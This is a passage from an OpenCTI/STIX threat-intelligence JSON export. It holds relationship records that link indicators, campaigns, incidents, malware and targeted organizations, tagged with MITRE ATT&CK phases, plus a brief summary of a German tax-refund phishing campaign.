"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--335444b8-a1df-4cb1-a1ce-f15377655a8a",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--af485c23-5498-400b-ba25-e05a9a3a0198",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--af485c23-5498-400b-ba25-e05a9a3a0198",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:20.358Z",
"modified": "2020-02-05T10:05:20.358Z",
"x_opencti_first_seen": "2020-02-05T10:05:20.358Z",
"x_opencti_last_seen": "2020-02-05T10:05:20.358Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "3865a11b-f6e8-4cee-adc6-69c6ef116cd0",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--0a1f226a-697d-4625-a2e9-a540d5a93243",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--f732504e-0cc0-4dce-b7e5-efab624f300c",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--f732504e-0cc0-4dce-b7e5-efab624f300c",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:13.501Z",
"modified": "2020-02-05T10:06:13.501Z",
"x_opencti_first_seen": "2020-02-05T10:06:13.501Z",
"x_opencti_last_seen": "2020-02-05T10:06:13.501Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ec3d24c8-27e1-4c76-9a82-9377ba8566b3",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--dcd2b964-691c-4d25-ae7b-602bd3bfb10d",
"type": "relationship",
"relationship_type": "uses",
"description": "Delivered by spearsphishing attachment.",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"created": "2020-02-04T14:43:51.749Z",
"modified": "2020-02-04T14:43:51.749Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "c4b1984f-740b-48e2-a7d6-0e444c6a89af",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9757781f-2322-4a4e-8651-64a6e883c538",
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
"x_opencti_id": "13cfffc3-1a9e-3c61-9316-0df2bbd23390",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:56:35.000Z",
"x_opencti_modified": "2019-04-15T16:56:35.000Z"
},
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--db73ac7d-4992-4e24-a7dc-b8ca7e6a1dfa",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"created": "2020-02-04T14:52:04.610Z",
"modified": "2020-02-04T14:52:04.610Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "c4911576-ec4a-49e0-b761-148ab081ada5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9b0f88fe-3501-4692-8b40-56d15aaf9eb3",
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement",
"x_opencti_id": "4084cfad-87e8-35c3-8162-e2db612f1cf1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:36.000Z",
"x_opencti_modified": "2019-04-15T16:53:36.000Z"
}
]
},
{
"id": "relationship--7a40d101-a198-4ad0-8e28-7b1964e2a58e",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"created": "2020-02-04T14:52:37.608Z",
"modified": "2020-02-04T14:52:37.608Z",
"x_opencti_first_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "29eaad38-2732-4d7c-93c8-20e291036bfc",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9b0f88fe-3501-4692-8b40-56d15aaf9eb3",
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement",
"x_opencti_id": "4084cfad-87e8-35c3-8162-e2db612f1cf1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:36.000Z",
"x_opencti_modified": "2019-04-15T16:53:36.000Z"
}
]
},
{
"id": "relationship--7e86b9d0-9584-435f-98f7-3a59cedb3f81",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:26:42.369Z",
"modified": "2020-02-04T15:26:42.369Z",
"x_opencti_first_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "6b3a78d1-9be4-48e0-9c02-184bc26357e9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--ca24ea86-2325-469b-9031-a56075c124ac",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"target_ref": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"x_opencti_source_ref": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"x_opencti_target_ref": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"created": "2020-02-04T15:44:30.266Z",
"modified": "2020-02-04T15:44:30.266Z",
"x_opencti_first_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "d745f008-6bc4-4dae-99bb-ceabae4908ca",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--c4512510-c528-42ae-9345-438f0fd04e6d",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--3a0ab761-cca4-4aec-b127-b103d978b7ed",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--3a0ab761-cca4-4aec-b127-b103d978b7ed",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:04:59.922Z",
"modified": "2020-02-05T10:04:59.922Z",
"x_opencti_first_seen": "2020-02-05T10:04:59.922Z",
"x_opencti_last_seen": "2020-02-05T10:04:59.922Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "e81dd45b-9c73-4795-8fe6-291d4662a2c0",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--9a581b08-5371-4d0c-8ca1-a933c60b2030",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--4a642ed5-f664-410a-b9b9-e7f0ab65bd18",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--4a642ed5-f664-410a-b9b9-e7f0ab65bd18",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:38.114Z",
"modified": "2020-02-05T10:05:38.114Z",
"x_opencti_first_seen": "2020-02-05T10:05:38.114Z",
"x_opencti_last_seen": "2020-02-05T10:05:38.114Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "5ffb5816-aa82-4e0f-85d4-009b67b9ce58",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--eb7acec0-1510-479e-abca-00056fd56e83",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--2e21736d-afe6-410e-8e99-7eb93c0089fa",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--2e21736d-afe6-410e-8e99-7eb93c0089fa",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:56.255Z",
"modified": "2020-02-05T10:05:56.255Z",
"x_opencti_first_seen": "2020-02-05T10:05:56.255Z",
"x_opencti_last_seen": "2020-02-05T10:05:56.255Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "b73f0b15-28f5-4def-a22b-42d4bf5d3faf",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--c0e4a44a-3b9f-4560-905a-636f2f6a8070",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--f20433f5-12e8-4cda-b752-630ca2d16852",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--f20433f5-12e8-4cda-b752-630ca2d16852",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:02.217Z",
"modified": "2020-02-05T10:06:02.217Z",
"x_opencti_first_seen": "2020-02-05T10:06:02.217Z",
"x_opencti_last_seen": "2020-02-05T10:06:02.217Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f46d6742-7877-4c47-880e-889631dc93f9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--f33f5d02-6467-49e0-9b10-95c55ef106b1",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--8751d70a-582a-4cff-a1b6-a87717386606",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--8751d70a-582a-4cff-a1b6-a87717386606",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:19.273Z",
"modified": "2020-02-05T10:06:19.273Z",
"x_opencti_first_seen": "2020-02-05T10:06:19.273Z",
"x_opencti_last_seen": "2020-02-05T10:06:19.273Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f168affd-d0f3-4187-8071-5c30e39f4fb0",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--d214bad4-8ae3-490b-83d9-00a8d0f6c7a1",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"target_ref": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"x_opencti_source_ref": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"x_opencti_target_ref": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"created": "2020-02-04T14:32:40.190Z",
"modified": "2020-02-04T14:32:40.190Z",
"x_opencti_first_seen": "2020-01-29T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-29T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7d6a1270-be4c-4bb1-8daa-32726917315c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--5400ff3b-0487-4455-a772-9097ae7751c3",
"type": "relationship",
"relationship_type": "uses",
"description": "On October 16 and 23, Proofpoint researchers observed hundreds of emails attempting to deliver malicious Microsoft Word attachments with German lures impersonating the Bundeszentralamt fur Steuern, the German Federal Ministry of Finance. Of particular note is the use of stolen branding as well as the use of lookalike .icu domains used for the sender email address in order to craft effective lures.\n\nThe lure states that a 2019 tax refund is due (\u201cBenachrichtigung \u00fcber die Steuerr\u00fcckerstattung\u201d) based on prior returns in the amount of several hundred euros (\u20ac694.00 in the observed sample)\nand that the recipient should submit a refund request (using an attached Microsoft Word document form) within three days for processing. The emails, as part of a low-volume campaign, were targeted primarily at IT services companies.",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"created": "2020-01-07T14:29:15.310Z",
"modified": "2020-01-07T14:29:15.310Z",
"x_opencti_first_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-22T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "928981a4-6873-4181-a0aa-708335b50e81",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--d0ab3ef9-3303-4e00-b050-2a1fad8fdf53",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"created": "2020-02-04T14:51:41.871Z",
"modified": "2020-02-04T14:51:41.871Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "3d1deeac-bb26-441a-8484-6dfccf9367b9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9b0f88fe-3501-4692-8b40-56d15aaf9eb3",
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement",
"x_opencti_id": "4084cfad-87e8-35c3-8162-e2db612f1cf1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:36.000Z",
"x_opencti_modified": "2019-04-15T16:53:36.000Z"
}
]
},
{
"id": "relationship--907cfddb-6c6e-4eb1-8c56-1596c1ecf9bc",
"type": "relationship",
"relationship_type": "uses",
"description": "exfiltration via FTP.",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"created": "2020-02-04T14:57:01.930Z",
"modified": "2020-02-04T14:57:01.930Z",
"x_opencti_first_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "71f29fa9-db84-4989-bb00-8c5e8aeede92",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5be39400-f246-4d70-b62e-9af8ecf62ee3",
"kill_chain_name": "mitre-attack",
"phase_name": "exfiltration",
"x_opencti_id": "1019d87a-7952-3847-b24e-a3b866f89afb",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:54:14.000Z",
"x_opencti_modified": "2019-04-15T16:54:14.000Z"
}
]
},
{
"id": "relationship--6cb972c9-84c3-4a01-8814-9ce23e386bc6",
"type": "relationship",
"relationship_type": "uses",
"description": "exfiltration via FTP.",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"created": "2020-02-04T14:58:24.142Z",
"modified": "2020-02-04T14:58:24.142Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "76ac45fd-4360-40e1-9f92-24d299d6649c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5be39400-f246-4d70-b62e-9af8ecf62ee3",
"kill_chain_name": "mitre-attack",
"phase_name": "exfiltration",
"x_opencti_id": "1019d87a-7952-3847-b24e-a3b866f89afb",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:54:14.000Z",
"x_opencti_modified": "2019-04-15T16:54:14.000Z"
}
]
},
{
"id": "relationship--217bfd74-4f42-483a-8e63-bb86f7566eed",
"type": "relationship",
"relationship_type": "uses",
"description": "exfiltration via FTP.",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"created": "2020-02-04T14:58:43.323Z",
"modified": "2020-02-04T14:58:43.323Z",
"x_opencti_first_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f91696bf-184b-4a79-9dfb-ca686295b116",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5be39400-f246-4d70-b62e-9af8ecf62ee3",
"kill_chain_name": "mitre-attack",
"phase_name": "exfiltration",
"x_opencti_id": "1019d87a-7952-3847-b24e-a3b866f89afb",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:54:14.000Z",
"x_opencti_modified": "2019-04-15T16:54:14.000Z"
}
]
},
{
"id": "relationship--fa57e1ab-092d-44a4-90a4-bea3641bd96e",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"target_ref": "identity--f4c6843f-ed38-46e0-9e95-35c781f935b1",
"x_opencti_source_ref": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"x_opencti_target_ref": "identity--f4c6843f-ed38-46e0-9e95-35c781f935b1",
"created": "2020-01-08T16:11:19.358Z",
"modified": "2020-01-08T16:11:19.358Z",
"x_opencti_first_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "cc0eacfa-cd0b-471f-85fd-41818be81b18",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--f805adbe-2c0b-4c13-a375-562b7ba8b625",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"target_ref": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"x_opencti_source_ref": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"x_opencti_target_ref": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"created": "2020-02-04T15:26:57.109Z",
"modified": "2020-02-04T15:26:57.109Z",
"x_opencti_first_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "6dc1938e-b447-476f-bcf5-4396dd6477d1",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--7de932be-bdd3-4c2a-8fa3-239e6a1b43dc",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"target_ref": "identity--d2d2f930-4f0e-409b-9565-899ba3aba6af",
"x_opencti_source_ref": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"x_opencti_target_ref": "identity--d2d2f930-4f0e-409b-9565-899ba3aba6af",
"created": "2020-02-04T15:28:01.025Z",
"modified": "2020-02-04T15:28:01.025Z",
"x_opencti_first_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "3dfc0e24-80a7-4382-a28c-f7bf9d31bdb2",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--5ccd07e8-781d-43c0-8448-0d6a18617554",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"created": "2020-02-04T15:31:59.613Z",
"modified": "2020-02-04T15:31:59.613Z",
"x_opencti_first_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "57750dd4-bacd-41d1-98e1-ea4d0a875a5f",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--8685ab4e-e44b-42f8-9f0a-0ce0b69ca115",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:32:15.773Z",
"modified": "2020-02-04T15:32:15.773Z",
"x_opencti_first_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "445d4fa9-6b54-43d2-9fc5-68bae9c72fea",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--f43ffd59-c8c6-4271-a322-c78ffb83555b",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"target_ref": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"x_opencti_source_ref": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"x_opencti_target_ref": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"created": "2020-02-04T15:32:22.782Z",
"modified": "2020-02-04T15:32:22.782Z",
"x_opencti_first_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "40ce522b-826e-4f43-ab1c-d8b207356546",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--6227f6bc-1caf-47fb-8c66-21135550ed76",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-02-04T15:35:05.605Z",
"modified": "2020-02-04T15:35:05.605Z",
"x_opencti_first_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "d553ec01-a53d-42e3-bc04-3c415559e3d4",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--87236979-65e4-445e-bd16-186f2081bc2c",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"created": "2020-02-04T15:39:16.051Z",
"modified": "2020-02-04T15:39:16.051Z",
"x_opencti_first_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "6bb2752c-b594-48a1-8cd4-6aabe28703ff",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--dd384fe8-e2f4-49c8-a0f5-f56571f4413d",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"target_ref": "identity--040b3a47-41a6-44d0-91f9-08614ba67364",
"x_opencti_source_ref": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"x_opencti_target_ref": "identity--040b3a47-41a6-44d0-91f9-08614ba67364",
"created": "2020-02-04T15:44:42.487Z",
"modified": "2020-02-04T15:44:42.487Z",
"x_opencti_first_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "67a53793-568e-41a3-9e4f-643fd6848ecc",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--bfc58ac1-0388-483b-b9c7-6c3695adfc0e",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:47:58.765Z",
